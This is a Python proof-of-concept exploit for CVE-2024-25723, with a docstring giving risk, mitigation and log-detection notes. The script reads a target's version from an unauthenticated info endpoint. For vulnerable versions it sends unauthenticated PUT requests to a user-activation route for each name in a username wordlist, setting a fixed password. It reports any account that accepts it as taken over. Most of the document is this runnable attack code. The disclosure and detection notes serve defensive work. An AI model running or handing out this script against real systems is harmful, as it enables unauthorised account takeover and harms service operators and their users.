"""Proof-of-concept for CVE-2024-25723 as published on this page.

What the script demonstrates (all visible below):
  * it reads the service version from ``/api/v1/info`` and compares it
    against ``0.46.7`` and a short list of back-ported fix releases;
  * for each name in ``common-usernames.txt`` it sends an *unauthenticated*
    ``PUT`` to ``/api/v1/users/<name>/activate`` carrying a JSON body with a
    fixed ``password`` value -- the only header sent is ``Content-Type``;
  * an HTTP 200 is treated as "the account now has the attacker-chosen
    password".

Defensive reading:
  * Risk: an account-activation route that sets a password without
    proving who the caller is amounts to an unauthenticated password
    reset for any guessable username.
  * Mitigation: run a release at or above the versions this script treats
    as safe (``> 0.46.7`` or one of ``patched_versions``), and keep the
    activation route behind authentication / a one-time token.
  * Detection: repeated ``PUT /api/v1/users/*/activate`` requests from a
    single source with no session or token, usually a burst of 4xx
    responses followed by a single 200, is the signature this script
    leaves in access logs.

The original file was collapsed onto a single line; it is re-flowed here
only so that it is readable.  No behaviour was changed.
"""

import requests
from packaging import version
import sys

# Exactly one argument: the base URL of the target, without a trailing slash.
if len(sys.argv) != 2:
    print("Usage: python3 exploit-CVE-2024-25723.py https://example.com")
    sys.exit(1)

base_url = sys.argv[1]

# "scheme://host" splits on "/" into exactly three parts; anything else
# (a trailing slash, a path) is rejected so the URLs built below stay well formed.
if len(base_url.split("/")) != 3:
    print("Please remove the '/' from the end of the url. Example: https://example.com")
    sys.exit(1)

# Releases older than 0.46.7 that the author treats as already fixed.
patched_versions = ["0.44.4", "0.43.1", "0.42.2"]

# Version fingerprint: the info endpoint is read without any credentials.
# NOTE(review): no timeout is set and the response is assumed to be JSON
# with a "version" key -- a non-JSON reply raises here.
info_api_url = f"{base_url}/api/v1/info"
response_info = requests.get(info_api_url)
#print(response_info.json())
response_info_version = response_info.json()['version']
#print(response_info_version)

# Vulnerable == version <= 0.46.7 and not one of the back-ported fixes.
if version.parse(response_info_version) <= version.parse("0.46.7") and response_info_version not in patched_versions:
    print("[*] Vulnerable version!")
    print("[*] Trying to find an valid username...")
    user_found = False
    # Username wordlist is read from the current working directory.
    with open("common-usernames.txt", 'r') as file:
        for line in file:
            user = line.strip()
            #print(user)
            activate_api_url = f"{base_url}/api/v1/users/{user}/activate"
            print(activate_api_url)
            # Only a content-type header is sent: there is no session, token
            # or basic-auth credential on this request.  That absence is the
            # whole vulnerability -- a fixed server should answer 401/403 here.
            activate_api_headers = {"Content-Type": "application/json"}
            activate_api_json={"password": "3gx9AbzP92rfHhZ"}
            activate_api_response = requests.put(activate_api_url, headers=activate_api_headers, json=activate_api_json)
            #print(activate_response.json())
            # A 200 is taken to mean the password was accepted for this user.
            # NOTE(review): whether every 200 really means "password set" is
            # not verifiable from the script; it is the author's assumption.
            if activate_api_response.status_code == 200:
                user_found = True
                # activate_api_url.split("/")[2] is the host[:port] component.
                host = activate_api_url.split("/")[2]
                print("---------------------------------")
                print(f"[*] User found: {user}")
                print("[*] New password: 3gx9AbzP92rfHhZ")
                print(f"[*] Try to login in: {host}")
                break
    if user_found == False:
        print(f"[*] The version is vulnerable but no valid user was found.")
else:
    print("[*] Version not vulnerable.")